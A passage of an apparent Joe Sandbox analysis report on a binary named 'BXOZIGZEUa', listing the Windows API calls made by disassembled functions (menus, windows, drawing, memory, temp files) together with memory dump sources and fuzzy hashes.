                                                              • OffsetRect.USER32(?,?,?), ref: 004F0D2D
                                                                • Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
                                                                • Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5
                                                              • CreateCompatibleDC.GDI32(?), ref: 004F0D9E
                                                              • SelectObject.GDI32(?,?), ref: 004F0DBE
                                                              • SelectObject.GDI32(?,?), ref: 004F0E00
                                                              • CreateCompatibleDC.GDI32(?), ref: 004F0F19
                                                              • SelectObject.GDI32(?,?), ref: 004F0F39
                                                              • SelectObject.GDI32(?,00000000), ref: 004F0F69
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$CompatibleCreateRect$H_prolog3H_prolog3_OffsetWindow
                                                              • String ID:
                                                              • API String ID: 2818906880-0
                                                              • Opcode ID: c119e07366c9270c006bd94e23ec4308d55bf5cd5329f07eaa133f38df246981
                                                              • Instruction ID: 9821f2e53de45a656e7fc914a5c47002f31a9437af84a87d676e3ab8ddb68382
                                                              • Opcode Fuzzy Hash: c119e07366c9270c006bd94e23ec4308d55bf5cd5329f07eaa133f38df246981
                                                              • Instruction Fuzzy Hash: 73A11471D0021EDFCF20EFA5C984AEEBBB5BF48304F1441AAE905B7252DA745A45CFA4
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004DA97B
                                                              • OleDuplicateData.OLE32(?,?,00000000), ref: 004DA9FC
                                                              • GlobalLock.KERNEL32(00000000), ref: 004DAA2B
                                                              • CopyMetaFileW.GDI32(?,00000000), ref: 004DAA37
                                                              • GlobalUnlock.KERNEL32(?), ref: 004DAA47
                                                              • GlobalFree.KERNEL32(?), ref: 004DAA50
                                                              • GlobalUnlock.KERNEL32(?), ref: 004DAA5C
                                                              • lstrlenW.KERNEL32(?,0000005C,005B2FF2,?,?,?), ref: 004DAABC
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,0000005C,005B2FF2,?,?,?), ref: 004DABB4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3_LockMetalstrlen
                                                              • String ID:
                                                              • API String ID: 3489744035-0
                                                              • Opcode ID: 5d42fb2d0deb2623b46507369726ab635a7929b35c89f51bcbc06ce90cf6dba1
                                                              • Instruction ID: f3810ff645bf1ac40d08b984991b32be93e39c169bdebf15bfd8e33ddded3e80
                                                              • Opcode Fuzzy Hash: 5d42fb2d0deb2623b46507369726ab635a7929b35c89f51bcbc06ce90cf6dba1
                                                              • Instruction Fuzzy Hash: 28816BB1A00506AFDB149FA4CD9893ABBB9FF44304710851BE4569B750D738EC21DB66
                                                              APIs
                                                                • Part of subcall function 0051B291: GetParent.USER32(?), ref: 0051B29D
                                                                • Part of subcall function 0051B291: GetParent.USER32(00000000), ref: 0051B2A0
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetParent.USER32(?), ref: 004EF248
                                                              • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 004EF25D
                                                              • GetClientRect.USER32(?,?), ref: 004EF2C4
                                                              • GetClientRect.USER32(?,?), ref: 004EF2D9
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A
                                                              • GetWindowRect.USER32(?,?), ref: 004EF2F9
                                                                • Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F
                                                              • GetParent.USER32(?), ref: 004EF348
                                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004EF35C
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 004EF3B1
                                                              • PostMessageW.USER32(?,00000000,00000000), ref: 004EF3D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientMessageParent$RectSendWindow$Screen$LongPost
                                                              • String ID:
                                                              • API String ID: 3884207962-0
                                                              • Opcode ID: afc467c3abc5099a5d2095644e5294c0dd27cb9252c69ca2fe1b88b6427dd3ab
                                                              • Instruction ID: 04c8b73a440fef7f71ea099b3c5c5799307b50918d3305b68e54ad07a7783df9
                                                              • Opcode Fuzzy Hash: afc467c3abc5099a5d2095644e5294c0dd27cb9252c69ca2fe1b88b6427dd3ab
                                                              • Instruction Fuzzy Hash: BC6109B1D00209AFCF10DFA9DC84AAEBBB5FF88304F11456AE905EB265CB759905CF64
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00540AB8
                                                              • CreatePopupMenu.USER32 ref: 00540AEF
                                                              • AppendMenuW.USER32(?,00000040,?,?), ref: 00540B8E
                                                              • GetLastError.KERNEL32 ref: 00540B98
                                                              • AppendMenuW.USER32(?,00000040,?,?), ref: 00540C0A
                                                              • GetLastError.KERNEL32 ref: 00540C12
                                                              • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00540C33
                                                              • GetLastError.KERNEL32 ref: 00540C3B
                                                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 00540C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$AppendErrorLast$CreateDefaultH_prolog3ItemPopup
                                                              • String ID:
                                                              • API String ID: 1085244643-0
                                                              • Opcode ID: b600293d10a53e5dc2b6312552c19ee4f76a10aef2058f0c53a62c41bbf48f5a
                                                              • Instruction ID: 2af6281185e0b82910a30d2c0a7de718002a3fb53b9b89e1296e2387b5f55857
                                                              • Opcode Fuzzy Hash: b600293d10a53e5dc2b6312552c19ee4f76a10aef2058f0c53a62c41bbf48f5a
                                                              • Instruction Fuzzy Hash: EA519331900616CFDB24DBA9CC89AFEBAB1FF44318F24062DE655A72D0DB349D41DB58
                                                              APIs
                                                                • Part of subcall function 004E1116: GetFocus.USER32 ref: 004E111C
                                                                • Part of subcall function 004E1116: GetParent.USER32(00000000), ref: 004E1144
                                                                • Part of subcall function 004E1116: GetWindowLongW.USER32(?,000000F0), ref: 004E115F
                                                                • Part of subcall function 004E1116: GetParent.USER32(?), ref: 004E116D
                                                                • Part of subcall function 004E1116: GetDesktopWindow.USER32 ref: 004E1171
                                                                • Part of subcall function 004E1116: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004E1185
                                                              • GetMenu.USER32(?), ref: 0051781C
                                                              • GetMenuItemCount.USER32(?), ref: 0051784C
                                                              • GetSubMenu.USER32(?,00000000), ref: 0051785D
                                                              • GetMenuItemCount.USER32(?), ref: 0051787F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 005178A0
                                                              • GetSubMenu.USER32(?,00000000), ref: 005178B8
                                                              • GetMenuItemID.USER32(?,00000000), ref: 005178D0
                                                              • GetMenuItemCount.USER32(?), ref: 00517907
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00517922
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                              • String ID:
                                                              • API String ID: 4186786570-0
                                                              • Opcode ID: 7b5614c2b09a5014b8c8c97e50b46beadf619cc7acf9dbfe08cff8f2ade87341
                                                              • Instruction ID: 82b48cf31a43a19b4f8c70230b0d2854d56041739e20921bfe1777bc5cb5b279
                                                              • Opcode Fuzzy Hash: 7b5614c2b09a5014b8c8c97e50b46beadf619cc7acf9dbfe08cff8f2ade87341
                                                              • Instruction Fuzzy Hash: 0D518C30904209AFEF11AF69C988AEEBFB5FF5C310F20446AE416E6121D735DD84DB60
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 004E14E9
                                                              • EnterCriticalSection.KERNEL32(?,00000010,004E16B2,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E14FA
                                                              • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1518
                                                              • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E154C
                                                              • LeaveCriticalSection.KERNEL32(004D106C,?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E15B8
                                                              • _memset.LIBCMT ref: 004E15D7
                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 004E15E8
                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1609
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                              • String ID:
                                                              • API String ID: 1891723912-0
                                                              • Opcode ID: 8e61d20f6362b9594d299519405e4427a5e28b422baf24016923124a5883a1ff
                                                              • Instruction ID: f8e07226bf584878064176f1df08fdc3523405919b05e14811e623bc0cebccb0
                                                              • Opcode Fuzzy Hash: 8e61d20f6362b9594d299519405e4427a5e28b422baf24016923124a5883a1ff
                                                              • Instruction Fuzzy Hash: 5E316A70540646AFCB20AF62DC85C7ABBA5FF44312B20892EF51696670CB38A954DB89
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Delete_memset$H_prolog3
                                                              • String ID: TR`
                                                              • API String ID: 1235337548-1372258800
                                                              • Opcode ID: 1aff86bf8042669a57cec6130dae14386e2bf46c29f7bd41fb61c6ad0da164fe
                                                              • Instruction ID: ad52eb9f489b68796e52969d9ab59ae64fce6abac4988ec3f5a153e30b7574c6
                                                              • Opcode Fuzzy Hash: 1aff86bf8042669a57cec6130dae14386e2bf46c29f7bd41fb61c6ad0da164fe
                                                              • Instruction Fuzzy Hash: EA2216B0D00629DFCF25DFA4C9856EDBBB5FF08704F10809AE459AB252EB305A95CF90
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005273E7
                                                              • GetWindow.USER32(?,00000005), ref: 00527407
                                                              • GetWindow.USER32(?,00000002), ref: 0052743D
                                                              • IsWindowVisible.USER32(?), ref: 00527521
                                                              • GetWindow.USER32(?,00000002), ref: 005277B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$H_prolog3Visible
                                                              • String ID: 83`$c
                                                              • API String ID: 3969123015-1750629417
                                                              • Opcode ID: 86298384300dcf2b8c186124015ce035b405f8a3b436d52c4a4c251c48e7bcc2
                                                              • Instruction ID: 6441740fb1534824352c50ab535059fe4cb7d20b6a28b887171e798151e14a05
                                                              • Opcode Fuzzy Hash: 86298384300dcf2b8c186124015ce035b405f8a3b436d52c4a4c251c48e7bcc2
                                                              • Instruction Fuzzy Hash: 98D19F30A0462A9FCF15EF65D899ABEBBF5BF49300F180569E806AB2D1DF349D40CB51
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: RectWindow
                                                              • String ID: X`$c
                                                              • API String ID: 861336768-3275090540
                                                              • Opcode ID: e1a583a593bbfab4cc3d553ccd699eae3a502bed97de265b9d70fc5a7c9213ce
                                                              • Instruction ID: d76f09d916217d82ce79797c220b12cc411a5de4cf9aac03e1f3b32e1ebe0a32
                                                              • Opcode Fuzzy Hash: e1a583a593bbfab4cc3d553ccd699eae3a502bed97de265b9d70fc5a7c9213ce
                                                              • Instruction Fuzzy Hash: 4B616C71600605AFDB15AF64C899EBEBBF9FF48300F10046EF646D7291DB359A41CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 83`
                                                              • API String ID: 0-1826646354
                                                              • Opcode ID: 4ef5e28b26c7cd01a39a6a1e4a6d061517c07e718a87d73fc26c70d61e7e642b
                                                              • Instruction ID: 8512e8f577200fd97a7a1ae70ba41a8713506ed0d458194b9e2cb0de5617926b
                                                              • Opcode Fuzzy Hash: 4ef5e28b26c7cd01a39a6a1e4a6d061517c07e718a87d73fc26c70d61e7e642b
                                                              • Instruction Fuzzy Hash: 03517971700604AFCB259F65C898F7A76A9EF48704F11056EFA4A9B2A1DF78ED00CB58
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 004FC112
                                                              • SendMessageW.USER32(00000000,0000040C,00000000,00000000), ref: 004FC151
                                                              • SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 004FC180
                                                              • SetRectEmpty.USER32(?), ref: 004FC1DA
                                                              • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 004FC240
                                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 004FC266
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                              • String ID: To`
                                                              • API String ID: 3879113052-992168270
                                                              • Opcode ID: ec3fa4903c864e2146181ff3540979627ba5584a98f68e2ab833492ff05df548
                                                              • Instruction ID: 27129566040dcbb65e5ccb0839903128ad171492afaac5f687d440fa5f166748
                                                              • Opcode Fuzzy Hash: ec3fa4903c864e2146181ff3540979627ba5584a98f68e2ab833492ff05df548
                                                              • Instruction Fuzzy Hash: EB512971A0021D9FDB20DFA8C984BAEBBF5FF48704F21416AE645E7291DB349940CF44
                                                              APIs
                                                              • PtInRect.USER32(?,?,?), ref: 0053CFB4
                                                              • PtInRect.USER32(?,?,?), ref: 0053CFC8
                                                              • GetWindowRect.USER32(?,?), ref: 0053CFE7
                                                              • PtInRect.USER32(?,?,?), ref: 0053D01E
                                                              • InflateRect.USER32(?,?,?), ref: 0053D030
                                                              • PtInRect.USER32(?,?,?), ref: 0053D040
                                                                • Part of subcall function 00508707: __EH_prolog3.LIBCMT ref: 0050870E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$H_prolog3InflateWindow
                                                              • String ID: c
                                                              • API String ID: 1292614506-2927717585
                                                              • Opcode ID: 734ffda51caf93221d694baa25624427288cc2422f834eaa949c194020995c69
                                                              • Instruction ID: 59d1d063fdd9c1aa0c661de544d8c75d8d16194b03bdfe1e8feb5fead216f5d7
                                                              • Opcode Fuzzy Hash: 734ffda51caf93221d694baa25624427288cc2422f834eaa949c194020995c69
                                                              • Instruction Fuzzy Hash: D851F371A0020AAFCF11DFA8D8889EEBBF9FF98710F20452AE515E7250D7359A45CF60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00531367
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 005313CA
                                                              • _memset.LIBCMT ref: 0053148B
                                                              • GetMenuItemInfoW.USER32 ref: 005314B6
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00531531
                                                              • UpdateWindow.USER32(?), ref: 0053153A
                                                                • Part of subcall function 0051B0E6: SendMessageW.USER32(?,00000229,00000000,?), ref: 0051B111
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$H_prolog3_InfoInvalidateItemLongMenuMessageRectSendUpdate_memset
                                                              • String ID: 0
                                                              • API String ID: 3082450406-4108050209
                                                              • Opcode ID: 27435166f3ba2d9d54ce9b399b3c4001effcf6c9185133a6bd24637aa54c9c58
                                                              • Instruction ID: 5b34489399053c8b561210c193e95b98efaf6c5a94cc3b85c217e5ab35af9b19
                                                              • Opcode Fuzzy Hash: 27435166f3ba2d9d54ce9b399b3c4001effcf6c9185133a6bd24637aa54c9c58
                                                              • Instruction Fuzzy Hash: F751A031500256DFDF24EBB4CC98BEDBFB9BF58340F2042AEA45A97191DE305A84CB50
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 00508527
                                                              • CloseHandle.KERNEL32(kQZ,00000080,005A516B,?,00000000,?,00000000), ref: 00508560
                                                              • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,00000080,005A516B,?,00000000,?,00000000), ref: 00508587
                                                              • GetTempFileNameW.KERNEL32(000000FF,AFX,00000000,00000000,00000104,00000000,000000FF,?,00000000), ref: 005085BE
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000000), ref: 005085E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
